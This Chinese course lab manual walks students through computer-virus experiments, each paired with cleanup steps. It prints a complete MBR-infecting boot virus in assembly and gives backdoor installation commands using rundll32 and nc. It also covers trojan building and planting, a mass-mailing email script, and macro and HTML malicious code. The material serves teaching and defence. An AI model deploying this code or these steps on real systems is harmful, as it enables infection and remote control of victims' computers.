软件安全实验步骤.doc

脚本病毒实验【实验环境】Windows实验台【实验步骤】打开Windows实验台，点击桌面“病毒实验”，选择“脚本病毒实验”，进入其实施面板，如图2.4.12所示。图2.4.12一、 脚本病毒代码分析和查看分别选择相应的脚本文件，学生用户即可查看脚本病毒代码。在界面左侧功能选择区选择实验名称，用户在界面右侧将会看到该脚本病毒的全部代码。如图2.4.13所示。图2.4.13学生用户如需要编辑脚本病毒代码，用户在界面右侧将会看到该脚本病毒的全部代码，在此基础上编辑代码，将会生成用户自定义的脚本病毒，点击“保存脚本”按钮将把编辑好的脚本文件永久保存，如果编辑过程出现错误或者异常，点击“重置脚本”将恢复最初的脚本代码。实验进行前，要先点击“初始化病毒工具”按钮，对其实验所需的工具进行初始化；在实验过程中，如果所需的工具被杀毒软件查杀，要再次点击“初始化病毒工具”按钮，对工具重新进行初始化，以便实验顺利进行。脚本实现的步骤为：执行(或恢复)脚本；关闭EXPlorer进程；打开EXPlorer进程；查看脚本是否生效。二、 病毒攻击实验1 -复制病毒副本到系统文件夹(1) 在界面左侧功能选择区选择实验名称“复制病毒副本到系统文件夹”。(2) 开始进行实验，运行脚本病毒代码，然后打开系统目录，如图2.4.14所示，可以看到病毒副本(Win32system.vbs)已经出现。图2.4.14(3) 开始恢复实验，运行恢复代码，如图2.4.15所示；然后再次查看系统目录，用户会发现刚刚出现的病毒副本文件已经被清除。图2.4.15三、 病毒攻击实验2 -复制病毒副本到启动菜单(1) 在界面左侧功能选择区选择实验名称“复制病毒副本到启动菜单”。(2) 开始进行实验，运行脚本病毒代码，然后打开系统目录，可以看到开始菜单启动项中新增加了脚本病毒Win32system.vbs，如图2.4.16所示，下次开机将会自动执行发作。图2.4.16(3) 开始恢复实验，运行恢复代码，然后再次查看系统目录，用户会发现刚刚出现的病毒副本文件已经被清除。四、 病毒攻击实验3 -禁止“运行”菜单(1) 在界面左侧功能选择区选择实验名称“禁止运行菜单”。(2) 开始进行实验，运行脚本病毒代码，然后打开开始菜单，如图2.4.17所示，“运行”已被禁止。图2.4.17(3) 开始恢复实验，运行恢复代码，然后再次打开开始菜单，选择“运行”，可以看到运行功能已经恢复。五、 病毒攻击实验4 -禁止“关闭系统”菜单(1) 在界面左侧功能选择区选择实验名称“禁止关闭系统菜单”。(2) 开始进行实验，运行脚本病毒代码，然后打开开始菜单，可以发现“关闭系统”菜单已经消失，如图2.4.18所示。图2.4.18(3) 开始恢复实验，运行恢复代码，然后再次打开开始菜单，可以看到“关闭计算机”功能已经恢复。六、 病毒攻击实验5 -禁止显示桌面所有图标(1) 在界面左侧功能选择区选择实验名称“禁止显示桌面所有图标”。(2) 开始进行实验，运行脚本病毒代码，执行系统注销操作，可以发现桌面所有图标均已经消失，如图2.4.19所示。图2.4.19(3) 开始恢复实验，运行恢复代码，可以发现桌面所有图标均已经恢复。七、 病毒攻击实验6 -禁止“任务栏”和“开始”(1) 在界面左侧功能选择区选择实验名称，禁止“任务栏”和“开始”。(2) 开始进行实验，运行脚本病毒代码，然后右键点击开始菜单属性，会有如图2.4.110所示的提示信息，禁止修改任务栏信息。图2.4.110(3) 开始恢复实验，运行恢复代码，再次修改开始菜单，功能已经恢复。八、 病毒攻击实验7 -禁止“控制面板”(1) 在界面左侧功能选择区选择实验名称“禁止控制面板”。(2) 开始进行实验，运行脚本病毒代码，选择“开始”菜单下的“设置”，可以看到“控制面板”项消失了，如图2.4.111所示。图2.4.111(3) 开始恢复实验，运行恢复代码，选择“开始”菜单下的“设置”，可以看到“控制面板”项已经恢复了。九、 病毒攻击实验8 -修改“IE”默认页(1) 在界面左侧功能选择区选择实验名称“修改IE默认页”。(2) 开始进行实验，运行脚本病毒代码，然后打开Internet EXPlorer属性，可以看到“地址栏”默认项已被进制更改，如图2.4.112所示。图2.4.112(3) 开始恢复实验，运行恢复代码，可以看到“地址栏”默认项已经恢复更改功能。DLL注入型病毒实验 【实验环境】Windows实验台所需工具：BITS.Dll 、IceSWord 【实验步骤】一、 安装BITS(Windows实验台)(1) 启动Windows实验台，进入Windows2003系统。(2) 从实验台打开实验工具箱，从“信息系统安全-计算机病毒”分类中下载DLL病毒并解压。(3) 进入cmd命令行，在BITS文件夹下运行rundll32.exe BITS.dll,Install ；为连接的识别码，主要用于识别远程连接属于正常服务还是bits后门服务。输入的命令具体如下：rundll32.exe BITS.dll,Install test。二、 连接BITS服务(本地主机)切换回本地主机系统，主动连接远程主机即Windows实验台系统的任一端口：(1) 从本地主机连接实验工具箱，从“网络安全-攻防系统中”下载NC连接工具并解压。(2) 进入cmd命令行，在NC.exe所在文件夹下输入nc 139命令，连接139端口(注： 为远程IP地址即Windows实验台IP)。(3) 然后直接输入testdancewithdolphinxell:9999，激活9999端口，其中test为连接识别码，与rundll32.exe BITS.dll,Install test中的test对应。(4) 连接远程主机9999端口：输入命令nc 9999；显示如图2.4.21所示，连接正常。(注： 为远程IP地址即Windows实验台IP) 图2.4.21三、 查看BITS主机状态(Windows实验台)(1) 查看Windows进程进入Windows实验台系统，打开任务管理器，查看进程信息，可以发现CMD程序正在运行，但实验台中并没有运行CMD程序，如图2.4.22所示。 图2.4.22(2) 查看系统端口在cmd命令行下输入netstat an，查看系统端口，如图2.4.23所示，可以观察到本地机（）对实验台（）9999端口进行的连接。 图2.4.23(3) 查看模块调用启用icesword，查看模块调用，如图2.4.24所示。 图2.4.24(4) 卸载验证卸载dll进程，再次连接查看软件是否工作正常。四、 卸载BITS(Windows 实验台)在Windows实验台的命令窗口执行命令：rundll32.exe BITS.dll,Uninstall 木马攻击实验 【实验环境】Windows实验台所需工具：灰鸽子客户端软件、icesWord 【实验步骤】启动Windows实验台，并设置实验台的IP地址，以实验台为目标主机进行实验。个别实验学生可以以2人一组的形式，互为攻击方和被攻击方来进行。一、 木马制作(1) 根据攻防实验制作灰鸽子木马，配置安装目录，IP地址填写攻击方的IP地址（本例采用的是本地机）如图2.4.31所示。 图2.4.31(2) 启动项配置，如图2.4.32所示。 图2.4.32(3) 高级设置，选择使用浏览器进程启动。并生成服务器程序，如图2.4.33所示。 图2.4.33二、 木马种植(1) 通过漏洞或溢出得到远程主机权限，上传并运行灰鸽子木马（本例目标以实验台为例）。服务器木马程序如图2.4.3-4 图2.4.34(2) 本地主机利用灰鸽子对植入灰鸽子的主机进行连接，看是否能连接灰鸽子。三、 木马分析(1) 察看端口当灰鸽子的客户端服务器启动之后，会发现本地灰鸽子客户端有主机上线，说明灰鸽子已经启动成功，如图2.4.35所示。 图2.4.35查看远程主机(实验台)的开放端口如图2.4.36所示，肉鸡正在与本地连接，表示肉鸡已经上线，可以对其进行控制。 图2.4.36(2) 查看进程启动icesWord检查开放进程，进程中多出了IEXPLORE.exe进程，如图2.4.37所示；这个进程即为启动灰鸽子木马的进程，起到了隐藏灰鸽子自身程序的目的。 图2.4.37(3) 查看服务进入“控制面板”-“管理工具”中的“服务”选项查看，增加了一个名为huigezi的服务，查看其属性如图2.4.38所示；该服务为启动计算机时，灰鸽子的启动程序。 图2.4.38四、 卸载灰鸽子(1) 停止当前运行的IEXPLORE程序和huigezi服务。(2) 将Windows目录下的huigezi.exe文件删除，重新启动计算机即可卸载灰鸽子程序。 引导型病毒实验 【实验环境】Windows实验台实验工具：MaxDos5.8、masm5、WinHex 【实验步骤】一、 查看主引导扇区打开Windows实验台，在启动选项中选择进入Windows2003系统；下载并解压引导型病毒工具，打开WinHex工具，点击菜单项“工具|磁盘编辑器”，打开磁盘编辑器，选择“物理媒介-HD0”，如图2.4.43和图2.4.44所示；点击“是”，即可查看第一块硬盘的具体内容，如图2.4.45所示，其中第一个扇区即为主引导扇区。 图2.4.43选择“磁盘编辑器” 图2.4.44选择HD0 图2.4.45主引导扇区二、 备份主引导扇区解压msam5.zip(本例解压到D盘根目录下)，并将前面解压到的“1.asm”文件复制到msam5目录下。然后安装MaxDos并重新启动系统，在启动选项中选择进入MaxDos v5.8s，如图2.4.46所示选择“运行MaxDos v5.8s”，回车；密码默认为max，直接回车进入如图2.4.47所示的界面，选择“A.MaxDos工具箱”，回车。 图2.4.46 MaxDos启动选项，选择“运行MaxDos v5.8s” 图2.4.47 MaxDos首菜单，选择“MaxDos工具箱”进入DOS系统界面，使用aefdisk工具对MBR进行备份，如图2.4.48所示。 图2.4.48备份MBR三、 编译并运行主引导区病毒程序输入如图2.4.49和图2.4.410所示的命令，编译并运行主引导区病毒源码1.asm（需放到masm5目录下,此示例中masm5解压到D盘根目录）。 图2.4.49编译病毒源码 图2.4.410连接生成exe并运行1.asm的具体内容与分析如下：;引导区病毒样例.286.model small.code;程序入口参数;ax=内存高端地址 bx=7c00h 引导程序起始地址;cx=0001h 表示从ch(00)磁道cl(01)扇区读出了本程序;dx=00/80h 表示从dx(00:A驱)(80:C驱)读出了本程序;ds=es=ss=cs=0 初始段值OFF equ VirusSize=OFF End-OFF StartStart: jmp short Begin VirusFlag db V ;病毒标志BootData: ;这里有两个重要数据结构，不能是代码 org 50h ;病毒从Offset50h开始，病毒未用以上数据Begin: ;但其它程序可能使用，故须保留 mov bx,7c00h mov sp,bx ;设sp,使ss:sp=0:7c00h sti mov ax,ds:413h ;得到内存大小(0:413h单元存有以K计数的内存大小) dec ax dec ax mov ds:413h,ax ;将原内存大小减2K mov cl,06 shl ax,cl ;计算高端内存地址 mov es,ax xor di,di mov si,sp mov cx,VirusSize cld rep movsb ;把病毒搬移到高端地址里 push ax mov di,OFF HighAddr push di retf ;跳到高端继续执行HighAddr: cli ;修改中断向量前，最好关中断 xchg ds:13h*4+2,ax mov cs:OldInt13Seg,ax mov ax,OFF NewInt13 xchg ds:13h*4,ax mov cs:OldInt13Off,ax ;修改中断13h push ds pop es ;把es复位为0 cmp dl,80h ;是否从硬盘引导？ jz short ReadOldHardBoot push dx ; 从软盘引导，则传染硬盘 mov dl,80h call OptDisk ;调用传染模块 pop dxReadOldFlopyBoot: ;读出原软盘引导程序 mov ax,0201h mov cx,79*100h+17 ;传染时将原引导程序保存在0面79道17扇区中 mov dh,00h call CallInt13 jc short ReadOldFlopyBoot ;失败，继续读直到成功ExecOldBoot: cmp es:bx.Flags,0aa55h jnz ExecOldBoot mov ah,02h int 1ah ;取系统时间 cmp cx,1*100h+30 ;是否大于01：30分 jb ExitDisp ;未到，则不显示 lea si,VirusMsg DispMsg: mov al,cs:si inc si mov ah,0eh int 10h ;显示al中的字符 or al,al jnz DispMsg xor ax,ax int 16hExitDisp: mov cx,0001h ;恢复cx初值 push es push bx retf ;去执行原引导程序ReadOldHardBoot: mov ax,0201h mov cx,0002h ;传染时将原硬盘主引导程序保存在0面0道2扇区中 mov dh,00h call CallInt13 ;读出 jc short ReadOldHardBoot ;失败，继续读直到成功 jmp short ExecOldBoot ;去执行原引导程序NewInt13: ;新Int 13h（传染块） cmp dx,0000h ;是软盘吗？ jnz short JmpOldInt13 cmp ah,02h jnz short JmpOldInt13 cmp cx,0001h jnz short JmpOldInt13 call OptDisk ;若发现读软盘扇区，则感染软盘JmpOldInt13: cli JmpFar db 0eah ;远跳转指令 OldInt13Off dw ? OldInt13Seg dw ?CallInt13: pushf ;模拟Int 13h指令 push cs call JmpOldInt13 ret OptDisk: ;传染dl表示的磁盘（dl-0 A: 80:C) pusha push ds push es ;保存段址与通用寄存器 push cs pop es push cs pop ds ;使ds=es=cs mov bx,OFF OldBootSpace mov ax,0201h mov cx,0001h mov dh,00h call CallInt13 ;读原引导扇区 jc short OptOver mov di,bx cmp ds:di.VirusFlag,V ;判断是否已经有病毒？ jz short OptOver ;若有，则退出 cmp dl,00h jz short IsOptFlopyDiskIsOptHardDisk: mov cx,0002h ;若是硬盘，保存在0面0道2扇区 jmp short SaveOldBootIsOptFlopyDisk: mov cx,79*100h+17 ;若是软盘，保存在0面79道17扇区SaveOldBoot: mov ax,0301h mov dh,0h call CallInt13 ;保存原引导扇区 jc short OptOver mov si,OFF Start cld movsw movsb ;修改原扇区首指令（Jmp near 3字节） mov di,OFF Begin+200h mov si,OFF Begin mov cx,OFF End-OFF Begin cld rep movsb ;修改原引导扇区指令cx字节 mov ax,0301h mov cx,0001h mov dh,00h call CallInt13 ;写回已经被修改了的引导程序OptOver: ;退出传染 pop es pop ds ;恢复段址与通用寄存器 popa ret ;以下是病毒要显示的信息，与病毒版本信息 VirusMsg db 0dh,0ah,07h,Night is deep,you must go sleep!,0dh,0ah,0 db Night Sleep ver 1.0,by whg 2001.5.5,0 End: org 1feh Flags dw 0aa55h ;引导扇区有效标志 OldBootSpace db 210h dup(?) ;定义缓冲区Install: xor ax,ax mov ds,ax cli mov ax,ds:13h*4 mov cs:OldInt13Off,ax mov ax,ds:13h*4+2 mov cs:OldInt13Seg,ax mov dl,80h call OptDisk mov ax,4c00h int 21hEnd Install四、 病毒感染症状与分析运行1.exe后，重新启动系统，首先看到如图2.4.411所示的界面，回车即可进入正常的启动选项；选择进入Win2003，打开WinHex工具，可以看到主引导扇区已被修改，原主引导扇区的内容已被病毒备份到第二个扇区，如图2.4.412所示。 图2.4.411系统启动选项前的病毒提示 图2.4.412被感染的主引导扇区五、 恢复MBR，清除病毒重新启动系统，进入MaxDos，使用aefdisk对MBR进行恢复，如图2.4.413所示（注意：在D盘生成的mbr.txt文件名大小写）。 图2.4.413恢复MBR恢复成功后重新启动系统，无病毒提示界面，进入Win2003系统，使用WinHex查看主引导区，如图2.4.414所示，已恢复为原内容。 图2.4.414已恢复的主引导扇区也可以尝试在Dos下使用fdisk /mbr命令对主引导区进行恢复，进入Windows系统后需在计算机管理中对非系统盘重新分配盘符，以正确显示在“我的电脑”中。 PE型病毒实验【实验环境】Windows实验台病毒实验工具【实验步骤】启动Windows实验台，进入Windows2003系统；双击桌面上的“病毒实验”图标，进入病毒实验界面。在界面上选择“PE病毒实验”，进入其实施面板，如图2.4.51所示。图Error! No text of specified style in document.1实验进行前，要先点击“初始化病毒工具”按钮，对其实验所需的工具进行初始化；在实验过程中，如果所需的工具被杀毒软件查杀，要再次点击“初始化病毒工具”按钮，对工具重新进行初始化，以便实验顺利进行。一、 HOST程序分析(1) 点击面板中“PE文件工具|浏览|host.exe”（C:ISES病毒ToolsVirusToolsPE目录下），如图2.4.52所示。图Error! No text of specified style in document.2(2) 点击“节表”，可查看节信息，如图2.4.53所示。图Error! No text of specified style in document.3(3) 点击面板中的“host程序”，运行如图2.4.54所示。图Error! No text of specified style in document.4(4) 通过点击面板中的“添加新节”，可使cc.exe感染host程序，然后点击面板中的“host程序”，查看感染后的运行结果。二、 感染过程(1) 点击面板中的“添加新节源码”，可看到win32汇编编写的病毒源码，如图2.4.55所示。图Error! No text of specified style in document.5(2) 通过点击面板中的“添加新节”，可使cc.exe感染host程序，出现如图2.4.56所示的提示；然后点击面板中的“host程序”，查看感染后的运行结果。图Error! No text of specified style in document.6(3) 点击确定，进入正常host程序，如图2.4.57所示。图Error! No text of specified style in document.7三、 感染前后对比及修改(1) 点击面板中“PE文件工具|浏览|host.exe”，如图2.4.58所示。图Error! No text of specified style in document.8(2) 点击“节表”，可查看节信息，如图2.4.59所示。图Error! No text of specified style in document.9(3) 几个关键值的对比，如图2.4.510和图2.4.511所示。图Error! No text of specified style in document.10图Error! No text of specified style in document.11(4) 简单修改数值，以达到原先正常运行效果，如图2.4.512所示设置相应的值。图Error! No text of specified style in document.12修改入口点为原先的000038FF，然后点击应用更改，成功修改完成；关闭peditor。然后点击面板中的“host程序”结果正常运行。COM病毒实验【实验环境】Windows实验台所需工具：masm6.0版本 gold.exe反汇编工具(可自行网上下载，本实验对其使用并不做要求)【实验步骤】启动Windows实验台，进入Windows2003系统。一、 准备实验环境(1) 在实验台系统中安装masm 16，如图2.4.61所示。图2.4.61(2) 安装完成后，加入相应的环境变量，如图2.4.62所示。图2.4.62二、 自制(1) 在实验台系统的c盘目录“c:temptemp”下新建两个文件“c.asm”和“virus.asm”；“c.asm”中代码如图2.4.63所示。图2.4.63(2) 编译生成“c.exe”，运行如图2.4.64所示。图2.4.64(3) 可在当前目录下查看新生成文件，如图2.4.65所示。图2.4.65(4) 将“c.exe”转换为“”程序，如图2.4.66所示。图2.4.66(5) 查看新生成的“”文件，如图2.4.67所示。图2.4.67三、 自制virus.exe(1) 在“virus.asm”中添加代码，如图2.4.68、图2.4.69和图2.4.610所示。图2.4.68图2.4.69图2.4.610(2) 编译生成可执行文件，如图2.4.611所示。图2.4.611(3) 查看生成文件，如图2.4.612所示。图2.4.612四、 感染并查看(1) “”正常执行。如图2.4.613所示。图2.4.613(2) 运行可执行文件进行感染，如图2.4.614所示。图2.4.614(3) 感染后文件变化，如图2.4.615所示。图2.4.615感染前后文件大小与时间的变化(4) 复制“”一个新文件“”，以便后面修改使用，如图2.4.616所示。图2.4.616(5) 执行“”结果如图2.4.617所示。图2.4.617五、 修复(1) 对“”进行修复，如图2.4.618所示。图2.4.618(2) 将“test1”改为“”，执行，如图2.4.619所示。图2.4.619(3) 使用“glod.exe”汇编工具，查看相关修改前后的文件内容，如图2.4.620和图2.4.621所示。图2.4.620图2.4.621邮件型病毒实验 【实验环境】Windows实验台所需工具：病毒实验工具 【实验步骤】一、 乔装执行后缀名(1) 启动Windows实验台，在实验台中启动实验工具箱下载实验工具并解压缩。双击执行MailServer.bat。从开始-程序-hMailServer-hMailServer Administrator启动，点击Connect按钮并输入密码123456。在界面左侧功能树中选择Status，确保服务状态为“Running”，如图2.4.71。此时邮件服务器中有两个邮件账户：、，密码均为：123456。 图2.4.71(2) 从开始-程序-Microsoft Office- Microsoft Office 工具找到Microsoft Office 2003 用户设置保存向导并启动。选下一步，选择“将原先保存的设置恢复应用到本机上”。选下一步，点击浏览选择解压缩得到的“用户设置导出.OPS”文件，点击完成-退出。此时Outlook中已导入了两个邮件账户、及其服务器设置信息，默认的Outlook发送邮件的账户为，并且两个邮箱地址都保存在Outlook的地址簿中。(3) 将解压缩得到的“mspaint.exe”文件（该文件是windows附带的画图工具软件）修改文件名为“hello.txt.exe”，创建并将其添加到压缩包“hello.rar”。(4) 启动Microsoft Office Outlook 2003（启动中及后续实验中弹出的安装提示可以全部按取消按钮）。点击工具栏新建按钮，新建邮件。收件人填写，主题和邮件正文可以随意填写。点击工具栏的回形针按钮添加附件，选择刚创建的“hello.rar”文件。邮件编写完成且尚未发送，如下图： (5) 恢复Windows资源管理器对文件类型扩展名的默认设置。打开资源管理器，依次打开菜单栏-工具-文件夹选项-查看，将“隐藏已知文件类型的扩展名”选中，如图2.4.71所示。 图2.4.71(6) 发送上一步中编写的邮件（若弹出安全警告选择仍然继续发送）。发送成功后继续在Outlook界面中按F9快捷键收取邮件（若提示输入密码时输入密码：123456，并选中“将密码保存在密码表中”复选框）。收到邮件后，可以看到带有一个附件“hello.rar”，下载附件并解压可以看到文件“hello.txt”，如图2.4.72所示 图2.4.72(7) 看似为txt文件文件，其实为可执行文件，双击打开可以发现实际是运行了一个画图程序。(8) 回到资源管理器的“文件夹设置”，去掉该选项，即可看到hello.txt的真正后缀名，如图2.4.74所示。 图2.4.74二、 收到可执行的vbs脚本文件一般利用vb脚本进行Outlook的控制发送，通常情况下为公司内局域网，根据地址本中所含地址，逐个发送带毒文件，代码大致如图2.4.75和图2.4.76所示。 图2.4.75 图2.4.76将Outlook中的、两个邮箱添加到通讯簿中后，执行上述脚本代码（此脚本代码可从试验台中打开实验工具箱按照“实验源码”-“计算机病毒源码”下载获取）。Outlook的安全机制会给出一些警告提示，出现的效果如2.4.77所示。 2.4.77如果用户由于在不知情的情况下或者安全意识薄弱甚至误操作等原因，而选择了允许访问及邮件发送，就造成了病毒的传播。在较高版本的Outlook中可以允许用户设置此类警告信息为不提示，更增加了病毒传播的机会。Outlook地址簿中保存的邮箱会收到如下的邮件： Outlook的安全机制判断附件为不安全因素而禁止用户访问附件，但使用其他简易邮件客户端或者用浏览器收取邮件时，用户可能会下载并执行附件脚本造成病毒的进一步传播。邮件病毒一般为附着型病毒，也就是通过邮件的形式来传播，病毒内部机制还是信赖其它文件型、木马、蠕虫等病毒体来发挥作用。通常不轻易打开不明附件，便无此类事件发生。 Word宏病毒实验【实验环境】Windows实验台所需工具：Word2003、Outlook2003【实验步骤】启动Windows实验台，进入Windows2003系统；双击桌面上的“病毒实验”图标，进入病毒实验界面。在界面上选择“Word宏病毒实验”，进入其实施面板，如图2.4.81所示。图2.4.81实验进行前，要先点击“初始化病毒工具”按钮，对其实验所需的工具进行初始化；在实验过程中，如果所需的工具被杀毒软件查杀，要再次点击“初始化病毒工具”按钮，对工具重新进行初始化，以便实验顺利进行。一、 使用示例1代码选择“示例1源码”，在右侧病毒介绍框内查看示例1 的源码，如图2.4.82所示。图2.4.82二、 对doc1进行病毒殖入(1) 点击“启动doc1”，打开Word文档，在工具栏点击“安全性”，设置Word安全性，如图2.4.83所示。图2.4.83(2) 按下Alt+F11，如图2.4.84所示；打开如图2.4.85所示的project(Doc1)中的ThisDocument，将示例1的源代码复制到此。图2.4.84图2.4.85(3) 查看“Normal|ThisDocument”，如图2.4.86所示Normal下的ThisDocument为空。图2.4.86(4) 关闭doc1文档。然后再点击面板中的“启动doc1”，在doc1打开的过程中，会出现如图2.4.87所示的提示框，示例代码1执行成功。图2.4.87三、 结果分析(1) 按下Alt+F11，查看其下的Normal模板中的ThisDocument，已被植入病毒代码，如图2.4.88所示。图2.4.88(2) 这时再打开其它doc文件，都会发生弹出对话框的效果，如图2.4.89所示。图2.4.89四、 查杀方法(1) 禁止宏防御宏病毒的根本，在于打开Word文档时先禁止所有以auto开头的宏。方法是：单击工具菜单下的“宏”，然后单击“安全性”，在如图2.4.810所示的对话框中选择“非常高”，这样Word就有了防止“自动宏”执行的功能，将取消未经签署的任何宏。图2.4.810(2) 删除来历不明的宏在宏管理器中，删除全部可疑宏，或者在宏编辑器中删除可疑宏。(3) 恢复被宏病毒所破坏的Word1) 退出Word，然后先到系统盘(c:)根目录下查看是否存在autoexec.dot文件，如果存在，而又不知道它是什么时候出现的，删除之。2) 找到normal.dot文件(一般在C:Documents and SettingsAdiministratorApplication DataMicrosoftTemplates目录中)，用先前的干净备份替换之或干脆删除之(会重新生成一个)。3) 查看normal.dot所在目录是否还存在其它模板文件，如果存在且不是自己复制进去的，删除之。4) 重新启动Word，即可恢复正常。HTML恶意代码实验【实验环境】Windows实验台所需工具：浏览器IE6.0或以上版本【实验步骤】启动Windows实验台，进入Windows2003系统；双击桌面上的“病毒实验”图标，进入病毒实验界面。在界面上选择“HTML恶意代码实验”，进入其实施面板。实验进行前，要先点击“初始化病毒工具”按钮，对其实验所需的工具进行初始化；在实验过程中，如果所需的工具被杀毒软件查杀，要再次点击“初始化病毒工具”按钮，对工具重新进行初始化，以便实验顺利进行。一、 进行test.html编辑(1) 点击面板中“编辑test网页”，将“更改主页”中代码添入并保存退出。如图2.4.91所示。图2.4.91(2) 此时，test.html网页已为包含恶意代码网页；在启动时，将修改注册表中“HKEY_CURRENT_USERSoftwareMicrosoftInternet EXPlorerMainStart Page”的值为“”。二、 被攻击现象(1) 点击面板中的“启动test网页”，如图2.4.92所示。图2.4.92(2) 点击“是”，执行完成，运行结果如图2.4.93所示。图2.4.93(3) 查看注册表中项，已改变，如图2.4.94所示。图2.4.94(4) 如果将html放入IIS中，被其它主机访问时，其它主机的IE需要进行设置，便可不出现步骤(1)中的提示了，如图2.4.95所示，将“Internet”和“本地Intranet”中的，“自定义设置”中的“安全设置”中所有的选项都“启动”。图2.4.95三、 防治方法(1) 要避免被网页恶意代码感染，首先关键是不要轻易去一些并不信任的站点。(2) 运行IE时，点击“工具|Internet选项|安全|Internet区域的安全级别”，把安全级别由“中”改为“高”。具体方案是：在IE窗口中点击“工具|Internet选项”，在弹出的对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置”对话框，把其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”。(3) 一定要在计算机上安装防火墙，并要时刻打开“实时监控功能”。(4) 在注册表的KEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下，增加名为DisableRegistryTools的DWORD值项，将其值改为“1”，即可禁止使用注册表编辑器命令regedit.exe。因为特殊原因需要修改注册表，可应用如下解锁方法：开始-运行-gpedit.msc 打开组策略 左面分级展开 用户配置-管理模板-系统 右面有个阻止访问注册表编辑工具 设置成已禁用 确定即可。(5) 随时升级IE浏览器的补丁。即时通信型病毒实验【实验环境】本地主机或Windows实验台或其他安装Windows系统的主机MSN【实验步骤】一、 病毒发作现象如图2.4.101所示，用户运行接收到的压缩文件中的程序就会被病毒感染。病毒还会在用户电脑里释放一个后门程序，黑客可以利用IRC软件远程控制中毒电脑，窃取个人资料，从而使用户面临极大的安全威胁。图2.4.101二、 手工清除方法(一) 删除病毒在注册表中的启动项目(1) 点击“开始”菜单，选择运行；输入“regedit”启动注册表编辑器。(2) 打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionShellServiceObjectDelayLoad项，找到名为“syshosts”一项，将其值记录下来。例如本机中该值为“8D4C2FB9-6DF1-46EA-B6A0-6403640115D6”，如图2.4.102所示。图2.4.102(3) 将syshosts项删除打开注册表中的HKEY_CLASSES_ROOTCLSID项，找到刚刚记录下的项目，本例中为8D4C2FB9-6DF1-46EA-B6A0-6403640115D6，如图2.4.103所示。图2.4.103(4) 重新启动计算机。(二) 删除病毒文件(1) 打开“我的电脑”，选择菜单“工具|文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，点击“确定”；同时取消掉“隐藏已知类型文件的扩展名”前的对勾，点击“确定”。(2) 进入Windows文件夹(默认为C:Windows)，找到名为“photos.zip”的文件，如图2.4.104所示，将其删除。图2.4.104(3) 进入系统文件夹(默认为C:Windowssystem32)，找到名为“syshosts.dll”的文件，如图2.4.105所示，将其删除。图2.4.105(4) 再次重新启动计算机，查看这两个文件是否存在，若不存在，则说明病毒已经被清除干净。键盘钩子病毒实验【实验环境】本地主机或Windows实验台或其他安装Windows系统的主机Microsoft Visual Studio 2005/C#【实验步骤】简单的理解，钩子就是想钩住一些东西，在程序里可以利用钩子提前处理些Windows消息。本实验通过键盘钩子实验介绍病毒的实现原理。下载本实验的示例源码，并解压缩。进入“HookTestbinDebug”目录，双击执行HookTest.exe如下图：点击开始按钮，用户在TextBox里输入的时候，不管敲键盘的哪个键，TextBox里显示的始终为“钩子已经改写了输入内容！”并给出提示信息“您输入的内容已经被改写，小心病毒哦！”如下图；这时我们就可以利用钩子监听键盘消息，先往Windows的钩子链表中加入一个自己写的钩子监听键盘消息，只要一按下键盘就会产生一个键盘消息，我们的钩子在这个消息传到TextBox之前先截获它，让TextBox显示“钩子已经改写了输入内容！”并弹出提示信息，之后结束这个消息，这样TextBox得